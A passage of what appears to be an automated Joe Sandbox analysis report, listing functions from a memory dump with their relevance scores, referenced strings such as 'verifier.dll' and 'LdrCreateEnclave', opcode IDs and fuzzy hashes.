                                                  • Instruction Fuzzy Hash: D8A17E75A08341DFE710CF29C484A1ABBF6FF88354F21496DE68597750EB30E945CB92
                                                  Function 36D57703 Relevance: 1.7, APIs: 1, Instructions: 179COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d7939e1f146cb00cf1149b8466f06991780ce2814b54fedcfa58a9eb7490b2b8
                                                  • Instruction ID: edfc136974f0adb911c32105eb2353ed28180ca33fac3f9c701f83631bacecd5
                                                  • Opcode Fuzzy Hash: d7939e1f146cb00cf1149b8466f06991780ce2814b54fedcfa58a9eb7490b2b8
                                                  • Instruction Fuzzy Hash: 6A615E75E00606AFEF08CF79C884A9DFBB5FF88244F25826AD519A7300DB30A955CBD1
                                                  Function 36D8F603 Relevance: 1.6, APIs: 1, Instructions: 121COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 35118722127871bacbe47829ae9642f80a4f525e030793149be371b85aa107c5
                                                  • Instruction ID: 38ee190199bfa2c936845aa2fd0c8c9ef521df27c4176d23604b20246f52a91d
                                                  • Opcode Fuzzy Hash: 35118722127871bacbe47829ae9642f80a4f525e030793149be371b85aa107c5
                                                  • Instruction Fuzzy Hash: 61414BB4D01288DFDB11CFAAC881AADBBF5BF49390F50426ED598A7211D7319905CFA0
                                                  Function 36D4B480 Relevance: 1.6, APIs: 1, Instructions: 100timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID:
                                                  • API String ID: 3446177414-0
                                                  • Opcode ID: 3517ad063066a3870b3240839ef243697d75d0e3f5d5f2606bb9f1cd4e006286
                                                  • Instruction ID: 5279042ceee4aed7987d7af075d0ea83e543299b22333d4a4187f762a7d1f63d
                                                  • Opcode Fuzzy Hash: 3517ad063066a3870b3240839ef243697d75d0e3f5d5f2606bb9f1cd4e006286
                                                  • Instruction Fuzzy Hash: A33155729003049FC312EF28C840A66B7B5FF843A8F514669ED445B291CB31ED02CFE0
                                                  Function 36D557C0 Relevance: 1.6, APIs: 1, Instructions: 92timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID:
                                                  • API String ID: 3446177414-0
                                                  • Opcode ID: 609c4b4169eea56f4833e83c9205ed884acc0d397776141b5700168f9cbf3d64
                                                  • Instruction ID: 13325aa66104312d3cab4a33406910d72c846647e557d1788548e8d4eecc3ac7
                                                  • Opcode Fuzzy Hash: 609c4b4169eea56f4833e83c9205ed884acc0d397776141b5700168f9cbf3d64
                                                  • Instruction Fuzzy Hash: 3431AF39A25A05FFEB469B24DE40A89BBA6FF84344F516025EA5187F50DB31E830CBD1
                                                  Function 36D53616 Relevance: 1.6, APIs: 1, Instructions: 84timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID:
                                                  • API String ID: 3446177414-0
                                                  • Opcode ID: 64189622f46deaa59af990cd2d36b5d5f564990e55d02ac5ba5d97bc7ecaa6c2
                                                  • Instruction ID: 757862af05d21ec5306438e15eb6eb29924593271da8311d9c144bc6424a37e2
                                                  • Opcode Fuzzy Hash: 64189622f46deaa59af990cd2d36b5d5f564990e55d02ac5ba5d97bc7ecaa6c2
                                                  • Instruction Fuzzy Hash: 102104759053509FDB229F16C948B1ABBA1FF80B15F93046DEA404BE50EB74E848CBD2
                                                  Function 36D492FF Relevance: 1.5, APIs: 1, Instructions: 35timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID:
                                                  • API String ID: 3446177414-0
                                                  • Opcode ID: 08a70f0b169d8bae7434400d47c1d1fb573a9548f66ffd83ff9e1b84d18580ad
                                                  • Instruction ID: 6e7c9cd58dcaf350a4f5817206b7ba2d57d3bce17aceca94e8dcd353c1190670
                                                  • Opcode Fuzzy Hash: 08a70f0b169d8bae7434400d47c1d1fb573a9548f66ffd83ff9e1b84d18580ad
                                                  • Instruction Fuzzy Hash: 06F0F032104240ABD732AB1ACC08F8ABBEDEF85710F190118F54693590CAA0B909C660
                                                  Function 36DFDEB0 Relevance: 1.4, Strings: 1, Instructions: 196COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  • System Volume Information, xrefs: 36DFDEBE
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: System Volume Information
                                                  • API String ID: 0-764423717
                                                  • Opcode ID: dce170f1a0cf50a057b159552faece6d1f6744b994c76ce52a9963efb0aa82c6
                                                  • Instruction ID: 7def8283f8e3fb1031646d80a9dc26b83fcbb8e8da1a4246ad9369245225e26c
                                                  • Opcode Fuzzy Hash: dce170f1a0cf50a057b159552faece6d1f6744b994c76ce52a9963efb0aa82c6
                                                  • Instruction Fuzzy Hash: 3B61BB71118355AFD321DF51CC80EABB7E9EF88B94F41082DF9819B2A0D675DD44CBA2
                                                  Function 36D5973A Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @
                                                  • API String ID: 0-2766056989
                                                  • Opcode ID: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                                  • Instruction ID: 275b453014e4a1e550f873d0fc3adbafc83ed04502c255f36ecd04cd636f1a4a
                                                  • Opcode Fuzzy Hash: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                                  • Instruction Fuzzy Hash: 65618CB6D01359AFEF11CF96C840BEEBBB4FF80754F11012AE911AB654D7748A01CBA1
                                                  Function 36DDF7AF Relevance: 1.4, Strings: 1, Instructions: 161COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @
                                                  • API String ID: 0-2766056989
                                                  • Opcode ID: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                                  • Instruction ID: ef581032521166db8eb4d6e76efd4af96d8102ab32a9e0d4c5bf65a0aea65eaa
                                                  • Opcode Fuzzy Hash: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                                  • Instruction Fuzzy Hash: C15187B2914745AFE7119F56CC50F6BB7E8FF84B54F400929F9809B290DBB4E904CBA2
                                                  Function 36D83EEB Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @
                                                  • API String ID: 0-2766056989
                                                  • Opcode ID: f6d24db04a8b22f10dd332497e656ae38b365cd664294fb4cdc3bf0e0e6027ed
                                                  • Instruction ID: 63a11d34b662d33e4d2f120cd7bd1f5a7c4d9f635274d4dbe401f7d95a616545
                                                  • Opcode Fuzzy Hash: f6d24db04a8b22f10dd332497e656ae38b365cd664294fb4cdc3bf0e0e6027ed
                                                  • Instruction Fuzzy Hash: C0519E715057149FD321CF56C840A6BB7F8FF88714F00892EF995876A0E7B4D904CBA6
                                                  Function 36E0B256 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: PreferredUILanguages
                                                  • API String ID: 0-1884656846
                                                  • Opcode ID: 9e1720e36f8b3f050ec6cc29b78e02a6e65a7c2097de5d0bb33d2d15c6c93e7e
                                                  • Instruction ID: b4ee59408d8aa278e75a9abdea7e9aa1787ff2e38a413477450f6a2c7a99f821
                                                  • Opcode Fuzzy Hash: 9e1720e36f8b3f050ec6cc29b78e02a6e65a7c2097de5d0bb33d2d15c6c93e7e
                                                  • Instruction Fuzzy Hash: 8241E776D00219ABDB01DA96CC44BEE73B9FF48758F210126E901E7250DAB9DD48CBA1
                                                  Function 36DD97A9 Relevance: 1.4, Strings: 1, Instructions: 121COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: verifier.dll
                                                  • API String ID: 0-3265496382
                                                  • Opcode ID: ce09e28a720c6a04a44f1eed38b317470658f4e0a9d669de337ce4e2d3b45f32
                                                  • Instruction ID: 8d8473979f58b563bd617a8e9928c2a12f27b914e8342fe48932a048178945df
                                                  • Opcode Fuzzy Hash: ce09e28a720c6a04a44f1eed38b317470658f4e0a9d669de337ce4e2d3b45f32
                                                  • Instruction Fuzzy Hash: D631B3B5E103019FD715AF2AD850A6677E6EF49B54FA0807AE605DF381EA328C81C790
                                                  Function 36D87505 Relevance: 1.4, Strings: 1, Instructions: 111COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: #
                                                  • API String ID: 0-1885708031
                                                  • Opcode ID: 4bc324cfbfa2083798c26090082f3552f5e90ae9522e24348f396a2005f93b47
                                                  • Instruction ID: f5943ea9d617f72348fc5e9e3519543ddd3db0c5b31d61dc35efb0b2fafb5b61
                                                  • Opcode Fuzzy Hash: 4bc324cfbfa2083798c26090082f3552f5e90ae9522e24348f396a2005f93b47
                                                  • Instruction Fuzzy Hash: 1F41B37990072AABEB11CF44C898BBEB7B5FF84745F51409AE84597240DB30D981CBE1
                                                  Function 36D4FF90 Relevance: 1.4, Strings: 1, Instructions: 109COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 36D50058
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode
                                                  • API String ID: 0-996340685
                                                  • Opcode ID: 49996d4c88f3900e408676fedb8339cb565e0acd3790e8adefb3c94280179961
                                                  • Instruction ID: 1e98e388c5bf330fbb94b00c5ff6846a3e265bc260242cf81c9751c2baeafd5d
                                                  • Opcode Fuzzy Hash: 49996d4c88f3900e408676fedb8339cb565e0acd3790e8adefb3c94280179961
                                                  • Instruction Fuzzy Hash: E8419E75E1074A9BDB24DFB9D440AEBB7F4BF45300F11482ED6AAC3640E730A545CBA2
                                                  Function 36D8D530 Relevance: 1.3, Strings: 1, Instructions: 85COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: g6
                                                  • API String ID: 0-3127300404
                                                  • Opcode ID: ffe7b89d415b89b5ef0c710daf68e9b55b042f2e6e8f0f88b55863993ea18a97
                                                  • Instruction ID: e3c0eac3f01a6e4f6ac7290a7290d5b7a92a5714da5d454663f1127bd2275f1c
                                                  • Opcode Fuzzy Hash: ffe7b89d415b89b5ef0c710daf68e9b55b042f2e6e8f0f88b55863993ea18a97
                                                  • Instruction Fuzzy Hash: BA2121B29053189BD712EF35CD05F477BE9AB84658F41082AFA44A7690EA30EC09C7F6
                                                  Function 36D55096 Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Actx
                                                  • API String ID: 0-89312691
                                                  • Opcode ID: 6b01b356ce09cfd2ee6c7589e83c70f730c747cbf2490e2a99f8c31863daf493
                                                  • Instruction ID: bf48eda00c5362b72013fe19717c0676acfa2a1e55bad978745928d41d131a59
                                                  • Opcode Fuzzy Hash: 6b01b356ce09cfd2ee6c7589e83c70f730c747cbf2490e2a99f8c31863daf493
                                                  • Instruction Fuzzy Hash: E0118E74B097128BFF164E1F8850A16B7A5EB812ACF32852BE691CBB90DB71D841C3C0
                                                  Function 36DD106E Relevance: 1.3, Strings: 1, Instructions: 62COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: LdrCreateEnclave
                                                  • API String ID: 0-3262589265
                                                  • Opcode ID: 674c5b094f06b69d0e1652cd148fbe78289818d85348c0e40504ecf6407318dd
                                                  • Instruction ID: c475e42a42b3cc07ede9cacb600fcb696c26554466cd82c43411c0ad4ac55e11
                                                  • Opcode Fuzzy Hash: 674c5b094f06b69d0e1652cd148fbe78289818d85348c0e40504ecf6407318dd
                                                  • Instruction Fuzzy Hash: 9721F3B19093449FC310DF6AD844A5BFBE8EFD5B40F404A1EB69097250D7B19409CB92
                                                  Function 36DA739A Relevance: .7, Instructions: 705COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ca2be2f3bd3e5f67e6befd00bf743ea2ee73452b627a3debe810c36105e7d291
                                                  • Instruction ID: 05a713f4f28cac7f0d03bf47660f861b2a6ffd23045412bf1536d6c826e11abd
                                                  • Opcode Fuzzy Hash: ca2be2f3bd3e5f67e6befd00bf743ea2ee73452b627a3debe810c36105e7d291
                                                  • Instruction Fuzzy Hash: 5E42AF79E047169FEB08CF59C894AAEB7B2FF88354F24856DD455AB340DB34E842CB90
                                                  Function 36E116CC Relevance: .6, Instructions: 571COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c11302270313a607e7aa911952348ea6f4b85bec7e53ea6131062482b00c6358
                                                  • Instruction ID: ae4b96dc261cce902ad151a2b148173f44ae0e1cb7963bbbf4a2e14824f9934a
                                                  • Opcode Fuzzy Hash: c11302270313a607e7aa911952348ea6f4b85bec7e53ea6131062482b00c6358
                                                  • Instruction Fuzzy Hash: 9422B179F00216CFDB09CF59C490AEEBBB2BF89348F64856DD4519B344DB30A94ADB90
                                                  Function 36D5D7E0 Relevance: .3, Instructions: 342COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a75ca35b7a57bfbae9a8027fe9d8e9e24fdbedf6e9259cdf6bede132f1756f61
                                                  • Instruction ID: 2ff372372ac3d607e17d6e4dbae0ad951286c277331b7d296af66cc139279ebc
                                                  • Opcode Fuzzy Hash: a75ca35b7a57bfbae9a8027fe9d8e9e24fdbedf6e9259cdf6bede132f1756f61
                                                  • Instruction Fuzzy Hash: E1C10474E013169FEF04CF59C840BAEB7B2FF94394F158269D925AB288D730E851CBA1
                                                  Function 36D6F460 Relevance: .3, Instructions: 321COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1fcb0fca64bf8179820b4fd725518c937fcd62ee22f3bcf81673525c0f1b9e07
                                                  • Instruction ID: 6384c58ee0cf381b347d0b7360d6ae9aa17e14b233cbb2b1962fa96493cc5d14
                                                  • Opcode Fuzzy Hash: 1fcb0fca64bf8179820b4fd725518c937fcd62ee22f3bcf81673525c0f1b9e07
                                                  • Instruction Fuzzy Hash: FFC12E75E15B208BEB04CF5AC590B7973B3FB8470CF958059E981AF2A1DB708941CBE0
                                                  Function 36D790DB Relevance: .3, Instructions: 287COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36d20000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2dd96bd6ea2acd7dbcafc867207760ae9bd9a60ed3b28ebefaa086eb0f831d0b
                                                  • Instruction ID: 6aed0a8f19b4fc1b5dc36e4cddb2c02d672e95b995a1d13dba0a85235af08883
                                                  • Opcode Fuzzy Hash: 2dd96bd6ea2acd7dbcafc867207760ae9bd9a60ed3b28ebefaa086eb0f831d0b
                                                  • Instruction Fuzzy Hash: C6A14972900219AFEB129FA5CC81FAE37B9EF45754F810064FA01AB2A4DB75DC41CBA5
                                                  Function 36DFB550 Relevance: .3, Instructions: 263COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 36D20000, based on PE: true
                                                  • Associated: 00000005.00000002.3396208437.0000000036E49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036E4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmpDownload File
